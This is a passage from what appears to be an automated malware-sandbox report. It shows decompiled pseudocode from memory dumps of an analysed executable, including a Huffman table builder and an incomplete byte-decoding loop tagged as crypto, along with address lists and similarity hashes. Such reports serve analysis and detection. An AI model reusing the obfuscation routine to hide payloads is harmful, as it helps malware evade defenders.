							goto L93;
						}
					}
				}
				L182:
				_t443 = 0;
				_t446[0x147] =  *(_t448 - 0x40);
				_t446[0x146] = _t425;
				( *(_t448 + 8))[1] = 0;
				goto L11;
			}

0x00406354
0x00406354
0x00406354
0x00406354
0x00406354
0x00406358
0x00000000
0x00000000
0x0040635e
0x0040635e
0x00406361
0x00406364
0x00406369
0x0040636b
0x0040636e
0x00406371
0x00406374
0x00406374
0x00406377
0x00000000
0x00000000
0x00406379
0x00406379
0x0040637c
0x00406381
0x00406383
0x00406386
0x0040638c
0x004060eb
0x004060eb
0x004060ee
0x004060f4
0x004060fa
0x00406103
0x00406109
0x0040610c
0x00406113
0x00406118
0x0040611e
0x00406129
0x00406129
0x00406392
0x00406392
0x0040639c
0x00000000
0x00000000
0x004063a2
0x004063a2
0x004063a6
0x004063a9
0x004063a9
0x004063ad
0x004063b3
0x004063b3
0x004063b6
0x004063b9
0x004063bf
0x00000000
0x00000000
0x004063c1
0x004063e3
0x004063e3
0x004063e6
0x00000000
0x00000000
0x004063c3
0x004063c7
0x00000000
0x00000000
0x004063cd
0x004063cd
0x004063d0
0x004063d3
0x004063d8
0x004063da
0x004063dd
0x004063e0
0x004063e0
0x004063e8
0x004063e8
0x004063ee
0x004063f1
0x004063f4
0x004063f4
0x004063fb
0x004063ff
0x00406403
0x00406406
0x00406409
0x0040640f
0x00406414
0x00000000
0x00000000
0x00406416
0x0040642a
0x0040642a
0x0040642e
0x00000000
0x00000000
0x00406418
0x0040641b
0x0040641b
0x00406422
0x00406427
0x00406427
0x00406427
0x00406430
0x00406430
0x00406433
0x00406441
0x00406447
0x0040644c
0x00406452
0x00406458
0x0040645e
0x00406465
0x00406479
0x00406479
0x00406a48
0x00406a48
0x00406a48
0x00406a4d
0x00000000
0x00000000
0x00406085
0x00406085
0x00000000
0x00406680
0x00406680
0x00406684
0x00406687
0x0040668a
0x0040668d
0x00000000
0x00000000
0x00406693
0x00406693
0x004066b8
0x004066b8
0x004066b8
0x004066ba
0x00000000
0x00000000
0x00406698
0x00406698
0x0040669c
0x00000000
0x00000000
0x004066a2
0x004066a2
0x004066a5
0x004066a8
0x004066ab
0x004066ad
0x004066af
0x004066b2
0x004066b5
0x004066b5
0x004066b5
0x004066bc
0x004066bc
0x004066c4
0x004066c7
0x004066ca
0x004066cd
0x004066d1
0x004066d4
0x004066d6
0x004066d9
0x004066db
0x004066ef
0x004066ef
0x004066f2
0x0040670c
0x0040670c
0x0040670f
0x00000000
0x00000000
0x00406715
0x00406715
0x00406718
0x00000000
0x00000000
0x0040671e
0x0040671e
0x00000000
0x0040671e
0x004066f4
0x004066f7
0x004066fe
0x00406701
0x00000000
0x00406701
0x004066dd
0x004066e1
0x004066e4
0x00000000
0x00000000
0x00406729
0x00406729
0x0040674e
0x0040674e
0x0040674e
0x00406750
0x00000000
0x00000000
0x0040672e
0x0040672e
0x00406732
0x00000000
0x00000000
0x00406738
0x00406738
0x0040673b
0x0040673e
0x00406741
0x00406743
0x00406745
0x00406748
0x0040674b
0x0040674b
0x0040674b
0x00406752
0x0040675a
0x0040675d
0x00406760
0x00406762
0x00406765
0x00406765
0x00406767
0x0040676b
0x0040676e
0x00406771
0x00406774
0x00000000
0x00000000
0x0040677a
0x0040677a
0x0040679f
0x0040679f
0x0040679f
0x004067a1
0x00000000
0x00000000
0x0040677f
0x0040677f
0x00406783
0x00000000
0x00000000
0x00406789
0x00406789
0x0040678c
0x0040678f
0x00406792
0x00406794
0x00406796
0x00406799
0x0040679c
0x0040679c
0x0040679c
0x004067a3
0x004067a3
0x004067ab
0x004067ae
0x004067b1
0x004067b4
0x004067b8
0x004067bb
0x004067bd
0x004067c0
0x004067c3
0x004067dd
0x004067dd
0x004067e0
0x00000000
0x00000000
0x004067e6
0x004067e6
0x004067e9
0x004067f0
0x00000000
0x004067f0
0x004067c5
0x004067c8
0x004067cf
0x004067d2
0x00000000
0x00000000
0x004067f8
0x004067f8
0x0040681d
0x0040681d
0x0040681d
0x0040681f
0x00000000
0x00000000
0x004067fd
0x004067fd
0x00406801
0x00000000
0x00000000
0x00406807
0x00406807
0x0040680a
0x0040680d
0x00406810
0x00406812
0x00406814
0x00406817
0x0040681a
0x0040681a
0x0040681a
0x00406821
0x00406829
0x0040682c
0x0040682f
0x00406831
0x00406834
0x00406834
0x00406836
0x00000000
0x00000000
0x0040683c
0x0040683c
0x0040683f
0x00406844
0x00406846
0x0040684c
0x0040684e
0x00406863
0x00406865
0x00406865
0x00406850
0x00406856
0x00406858
0x0040685a
0x0040685a
0x00406867
0x0040686b
0x0040686e
0x00406874
0x00406874
0x00406877
0x00406877
0x00406877
0x00406879
0x00000000
0x00000000
0x0040687f
0x0040687f
0x00406885
0x00406887
0x004068ac
0x004068af
0x004068b5
0x004068ba
0x004068c0
0x004068c6
0x004068c8
0x004068cb
0x004068d4
0x004068da
0x004068da
0x004068cd
0x004068cf
0x004068d1
0x004068d1
0x004068dc
0x004068e2
0x004068e4
0x004068e7
0x004068e9
0x004068ef
0x004068f1
0x004068f3
0x004068f5
0x004068f7
0x004068fa
0x00406903
0x00406906
0x00406906
0x004068fc
0x004068fc
0x004068ff
0x004068ff
0x004068fa
0x004068f1
0x00406908
0x0040690a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040690a
0x00406889
0x00406889
0x0040688f
0x00406895
0x00406897
0x00000000
0x00000000
0x00406899
0x00406899
0x0040689b
0x0040689d
0x004068a6
0x004068a6
0x0040689f
0x0040689f
0x004068a2
0x004068a2
0x004068a8
0x004068aa
0x00000000
0x00000000
0x00406910
0x00406910
0x00406915
0x00406917
0x00406918
0x00406919
0x0040691a
0x00406920
0x00406923
0x00406926
0x00406929
0x0040692b
0x00406931
0x00406931
0x00406934
0x00406934
0x00406934
0x00406934
0x0040693d
0x00000000
0x00000000
0x00406942
0x00406942
0x00406945
0x00406948
0x0040694a
0x004069e1
0x004069e1
0x004069e4
0x004069e6
0x004069e7
0x004069e8
0x004069eb
0x00000000
0x004069eb
0x00406950
0x00406950
0x00406956
0x00406958
0x0040697d
0x00406980
0x00406986
0x0040698b
0x00406991
0x00406997
0x00406999
0x0040699c
0x004069a5
0x004069ab
0x004069ab
0x0040699e
0x004069a0
0x004069a2
0x004069a2
0x004069ad
0x004069b3
0x004069b5
0x004069b8
0x004069ba
0x004069c0
0x004069c2
0x004069c4
0x004069c6
0x004069c8
0x004069cb
0x004069d4
0x004069d7
0x004069d7
0x004069cd
0x004069cd
0x004069d0
0x004069d0
0x004069cb
0x004069c2
0x004069d9
0x004069db
0x00000000
0x00000000
0x00000000
0x00000000
0x004069db
0x0040695a
0x0040695a
0x00406960
0x00406966
0x00406968
0x00000000
0x00000000
0x0040696a
0x0040696a
0x0040696c
0x0040696e
0x00406975
0x00406975
0x00406977
0x00406970
0x00406970
0x00406972
0x00406972
0x00406979
0x0040697b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004069f3
0x004069f3
0x004069f6
0x004069f8
0x004069fb
0x004069fe
0x004069fe
0x004069fe
0x004069fe
0x00000000
0x00000000
0x00000000
0x004060ac
0x00406090
0x00000000
0x00406096
0x00406099
0x004060a3
0x004060a6
0x004060a9
0x00000000
0x004060a9
0x00406090
0x004060b4
0x004060b7
0x004060bb
0x004060c5
0x004060cf
0x004060d2
0x004060d8
0x0040620c
0x0040620e
0x00406214
0x00406217
0x0040621a
0x00000000
0x0040621a
0x004060de
0x004060de
0x004060df
0x00406137
0x00406137
0x0040613e
0x004061e4
0x004061e4
0x004061e9
0x004061ec
0x004061f1
0x004061f4
0x004061f9
0x004061fc
0x00406201
0x00406204
0x00406204
0x00000000
0x00406144
0x00406144
0x00406144
0x00406144
0x00406148
0x00406148
0x0040616a
0x0040616d
0x0040616f
0x00406172
0x00406177
0x0040614d
0x0040614d
0x00406152
0x00406154
0x00406156
0x0040615b
0x00406161
0x00406166
0x00406168
0x00406168
0x0040615d
0x0040615d
0x0040615d
0x0040615b
0x00000000
0x00406179
0x004061a6
0x004061ab
0x004061ad
0x004061ae
0x004061b0
0x004061b1
0x004061b1
0x004061b1
0x004061d9
0x004061de
0x004061de
0x00000000
0x004061de
0x00406177
0x0040613e
0x004060e1
0x004060e1
0x004060e2
0x0040612c
0x00000000
0x0040612c
0x004060e4
0x004060e5
0x00000000
0x00000000
0x00000000
0x00000000
0x00406241
0x00406241
0x00406241
0x00406244
0x00000000
0x00000000
0x00406221
0x00406221
0x00406225
0x00000000
0x00000000
0x0040622b
0x0040622b
0x0040622e
0x00406231
0x00406236
0x00406238
0x0040623b
0x0040623e
0x0040623e
0x0040623e
0x00406246
0x00406246
0x00406249
0x0040624b
0x00406250
0x00406253
0x00406255
0x00406258
0x00000000
0x00000000
0x0040625e
0x0040625e
0x00406260
0x00000000
0x00000000
0x00406266
0x00406266
0x0040626a
0x00000000
0x00000000
0x00406270
0x00406270
0x00406273
0x00406275
0x00406313
0x00406313
0x00406316
0x00406318
0x00406318
0x0040631b
0x0040631e
0x00406320
0x00406322
0x00406324
0x00406324
0x0040632d
0x00406332
0x00406335
0x00406338
0x0040633b
0x0040633e
0x0040633e
0x0040633e
0x00406341
0x00406347
0x00406347
0x0040634d
0x0040634d
0x0040634d
0x00000000
0x00406341
0x0040627b
0x0040627b
0x00406281
0x00406284
0x00406286
0x004062b1
0x004062b4
0x004062ba
0x004062bf
0x004062c5
0x004062cb
0x004062cd
0x004062d0
0x004062d9
0x004062df
0x004062df
0x004062d2
0x004062d4
0x004062d6
0x004062d6
0x004062e1
0x004062e7
0x004062ea
0x004062ec
0x004062ee
0x004062f4
0x004062f6
0x004062f8
0x004062fb
0x00406304
0x00406304
0x00406306
0x004062fd
0x004062fd
0x00406300
0x00406300
0x00406308
0x00406308
0x004062f6
0x0040630b
0x0040630d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040630d
0x00406288
0x00406288
0x0040628e
0x00406294
0x00406296
0x00000000
0x00000000
0x00406298
0x00406298
0x0040629a
0x0040629c
0x0040629f
0x004062a6
0x004062a6
0x004062a8
0x004062a1
0x004062a1
0x004062a3
0x004062a3
0x004062aa
0x004062ac
0x004062af
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004063b3
0x004063b6
0x004063b9
0x004063bf
0x00000000
0x00000000
0x00000000
0x00000000
0x00406596
0x00406596
0x00406596
0x00406599
0x0040659c
0x0040659e
0x004065a1
0x004065a7
0x004065ae
0x004065b0
0x00000000
0x00000000
0x00406484
0x00406484
0x004064ac
0x004064ac
0x004064ac
0x004064ae
0x00000000
0x00000000
0x0040648c
0x0040648c
0x00406490
0x00000000
0x00000000
0x00406496
0x00406496
0x00406499
0x0040649c
0x0040649f
0x004064a1
0x004064a3
0x004064a6
0x004064a9
0x004064a9
0x004064a9
0x004064b0
0x004064b0
0x004064b8
0x004064bb
0x004064c1
0x004064c4
0x004064c8
0x004064cc
0x004064cf
0x004064d2
0x004064ea
0x004064ea
0x004064ed
0x004064fb
0x004064fe
0x004064ef
0x004064ef
0x004064f1
0x004064f8
0x004064f8
0x00406527
0x00406527
0x00406527
0x0040652a
0x0040652c
0x00000000
0x00000000
0x00406507
0x00406507
0x0040650b
0x00000000
0x00000000
0x00406511
0x00406511
0x00406514
0x00406517
0x0040651a
0x0040651c
0x0040651e
0x00406521
0x00406524
0x00406524
0x00406524
0x0040652e
0x0040652e
0x00406530
0x00406532
0x0040653d
0x00406540
0x00406543
0x00406545
0x00406547
0x00406549
0x0040654c
0x0040654f
0x00406554
0x00406557
0x0040655a
0x0040655d
0x00406564
0x00406567
0x00406569
0x00000000
0x00000000
0x0040656f
0x0040656f
0x00406573
0x00406584
0x00406584
0x00406584
0x00406586
0x00406586
0x0040658a
0x0040658a
0x0040658a
0x0040658c
0x0040658d
0x00406590
0x00406590
0x00406590
0x00406593
0x00000000
0x00406593
0x00406575
0x00406575
0x00406578
0x00000000
0x00000000
0x0040657e
0x0040657e
0x00000000
0x0040657e
0x004064d4
0x004064d4
0x004064d6
0x004064d8
0x004064db
0x004064de
0x004064e2
0x004064e2
0x004065b6
0x004065b6
0x004065b9
0x004065c0
0x004065c4
0x004065c6
0x004065c9
0x004065cc
0x004065d1
0x004065d4
0x004065d6
0x004065d7
0x004065da
0x004065e5
0x004065e8
0x004065ff
0x00406604
0x0040660b
0x00406610
0x00406614
0x00406616
0x00406616
0x00406616
0x00406619
0x0040661b
0x00000000
0x00406621
0x00406621
0x00406625
0x00406630
0x00406643
0x00406648
0x0040664d
0x0040664f
0x00000000
0x00000000
0x00406655
0x00406655
0x00406658
0x0040665a
0x00406668
0x00406668
0x0040666b
0x0040666b
0x0040666e
0x00406671
0x00406674
0x00406677
0x0040667a
0x0040667d
0x00000000
0x0040667d
0x0040665c
0x0040665c
0x00406662
0x00000000
0x00000000
0x00000000
0x00406662
0x00000000
0x00000000
0x00000000
0x00406a01
0x00406a01
0x00406a07
0x00406a0d
0x00406a12
0x00406a18
0x00406a1e
0x00406a20
0x00406a23
0x00406a2c
0x00406a32
0x00406a32
0x00406a25
0x00406a27
0x00406a29
0x00406a29
0x00406a34
0x00406a36
0x00406a39
0x00406a74
0x00406a74
0x00000000
0x00406a3b
0x00406a3b
0x00406a3b
0x00406a41
0x00406a44
0x00406a46
0x00406a7b
0x00406a7d
0x00000000
0x00406a7d
0x00000000
0x00406a46
0x00000000
0x00406085
0x00406a53
0x00000000
0x00406a53
0x00406467
0x00406469
0x00000000
0x00000000
0x0040646b
0x0040646b
0x0040646e
0x00000000
0x0040646e
0x004063b3
0x00406374
0x00406a58
0x00406a5b
0x00406a5d
0x00406a66
0x00406a6c
0x00000000

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54d80564fe19f3f3404c6606d58c011d861cfab5a50afacd25c13b8f5d904866
Instruction ID: 2fa80b96e0c3f2f9afba8e6e6bfd5b6e13d9d39ff7e82b1c07230a33620f403b
Opcode Fuzzy Hash: 54d80564fe19f3f3404c6606d58c011d861cfab5a50afacd25c13b8f5d904866
Instruction Fuzzy Hash: 5BE1797190070ADFDB24CF58C980BAEBBF5EB45305F15892EE897A7291D338A991CF14

Uniqueness

Uniqueness Score: -1.00%

Function 00406B2B, Relevance: .3, Instructions: 300
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00406B2B(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x42ceb8 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x42ceb8;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x42ceb8 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}

0x00406b36
0x00406b3e
0x00406b42
0x00406b44
0x00406b47
0x00406b49
0x00406b49
0x00406b4b
0x00406b52
0x00406b54
0x00406b54
0x00406b5a
0x00406b6f
0x00406b77
0x00406b79
0x00406b7b
0x00406b7e
0x00406b7f
0x00406b7f
0x00406b85
0x00000000
0x00000000
0x00406b87
0x00406b8a
0x00000000
0x00000000
0x00000000
0x00406b8a
0x00406b8e
0x00406b91
0x00406b93
0x00406b93
0x00406b96
0x00406b9c
0x00406b9d
0x00000000
0x00000000
0x00000000
0x00406b9d
0x00406ba2
0x00406ba5
0x00406ba7
0x00406ba7
0x00406bad
0x00406baf
0x00406bc0
0x00406bb3
0x00406bb7
0x00406e5c
0x00000000
0x00406e5c
0x00406bbd
0x00406bbe
0x00406bbe
0x00406bc6
0x00406bc9
0x00406bcd
0x00406bcf
0x00406bd1
0x00406bd4
0x00000000
0x00000000
0x00406bdc
0x00406be2
0x00406be4
0x00406be6
0x00406be7
0x00406bfc
0x00406bfc
0x00406bff
0x00406c01
0x00406c01
0x00406c03
0x00406c08
0x00406c0a
0x00406c11
0x00406c13
0x00406c1b
0x00406c1b
0x00406c1d
0x00406c1e
0x00406c2d
0x00406c31
0x00406c35
0x00406c38
0x00406c3b
0x00406c40
0x00406c43
0x00406c49
0x00406c50
0x00406c56
0x00406e4f
0x00406e4f
0x00406e54
0x00406e63
0x00000000
0x00000000
0x00000000
0x00406e54
0x00406c63
0x00406c66
0x00406c69
0x00406c6c
0x00406c70
0x00000000
0x00000000
0x00406c7b
0x00406c7e
0x00406c7f
0x00406c81
0x00406c87
0x00406c8a
0x00000000
0x00000000
0x00406c90
0x00406c91
0x00406c94
0x00406c97
0x00406c9a
0x00406ca0
0x00406ca2
0x00406ca2
0x00406caa
0x00406cae
0x00406cb3
0x00406cd8
0x00406cde
0x00406ce0
0x00406ce2
0x00406ce5
0x00406cee
0x00000000
0x00000000
0x00406cb5
0x00406cb5
0x00406cbe
0x00406cc2
0x00000000
0x00000000
0x00406cd3
0x00406cd3
0x00406cd6
0x00000000
0x00000000
0x00406cc6
0x00406cc9
0x00406ccb
0x00406ccf
0x00000000
0x00000000
0x00406cd1
0x00406cd1
0x00000000
0x00406cd3
0x00406cf7
0x00406cfd
0x00406d07
0x00406d09
0x00406d0e
0x00406d10
0x00406d46
0x00406d12
0x00406d12
0x00406d15
0x00406d18
0x00406d22
0x00406d25
0x00406d2c
0x00406d37
0x00406d3e
0x00406d3e
0x00406d48
0x00406d4b
0x00406d4d
0x00406d53
0x00406d53
0x00406d5c
0x00406d5f
0x00406d64
0x00406d73
0x00406d7b
0x00406d80
0x00406da4
0x00406dac
0x00406db0
0x00406db6
0x00406d82
0x00406d90
0x00406d93
0x00406d99
0x00406d99
0x00406dba
0x00406d75
0x00406d75
0x00406d75
0x00406dcb
0x00406dcf
0x00406ddb
0x00406dd6
0x00406dd9
0x00406dd9
0x00406de3
0x00406de8
0x00406df0
0x00406dec
0x00406dee
0x00406dee
0x00406df6
0x00406df8
0x00406dff
0x00406e09
0x00406e13
0x00406e2f
0x00406e33
0x00406c78
0x00406c7e
0x00406c7f
0x00406c81
0x00406c87
0x00406c8a
0x00000000
0x00000000
0x00000000
0x00406c8a
0x00000000
0x00000000
0x00000000
0x00000000
0x00406e15
0x00406e15
0x00406e15
0x00406e1a
0x00406e23
0x00406e2c
0x00000000
0x00406e2c
0x00406e39
0x00406e39
0x00406e3c
0x00406e43
0x00406e46
0x00000000
0x00406c69
0x00406be9
0x00406beb
0x00406beb
0x00406bef
0x00406bf2
0x00406bf3
0x00406bf3
0x00000000
0x00406beb
0x00406b5f
0x00406b65
0x00000000

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac19822e65b9eb32b60c0006d09f593d524529e242751fff4e2df6e5f6ee417a
Instruction ID: 226139066da84df80bc4b15dd4b3e380d67d521acd3bdc5c46ce9393f3ccc406
Opcode Fuzzy Hash: ac19822e65b9eb32b60c0006d09f593d524529e242751fff4e2df6e5f6ee417a
Instruction Fuzzy Hash: 8BC13B71A00219CBDF14CF68C4905EEB7B2FF99314F26826AD856BB384D7346952CF94

Uniqueness

Uniqueness Score: -1.00%

Function 6FD8BA6A, Relevance: .3, Instructions: 284
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E6FD8BA6A(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v5;
				signed int _v12;

				_v12 = _v12 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				while(_v12 < _a8) {
					_v5 =  *((intOrPtr*)(_a4 + _v12));
					_v5 = _v5 & 0x000000ff ^ 0x000000e7;
					_v5 = (_v5 & 0x000000ff) - 0xb8;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) - 0x3b;
					_v5 = (_v5 & 0x000000ff) >> 0x00000002 | (_v5 & 0x000000ff) << 0x00000006;
					_v5 = (_v5 & 0x000000ff) - 0xf3;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = _v5 & 0x000000ff ^ 0x0000005f;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) + 0xf3;
					_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) - _v12;
					_v5 = _v5 & 0x000000ff ^ 0x0000001c;
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 = _v5 & 0x000000ff ^ 0x0000000b;
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 = _v5 & 0x000000ff ^ 0x000000d3;
					_v5 = (_v5 & 0x000000ff) - 0xc5;
					_v5 = _v5 & 0x000000ff ^ 0x0000006b;
					_v5 = (_v5 & 0x000000ff) + 0xb0;
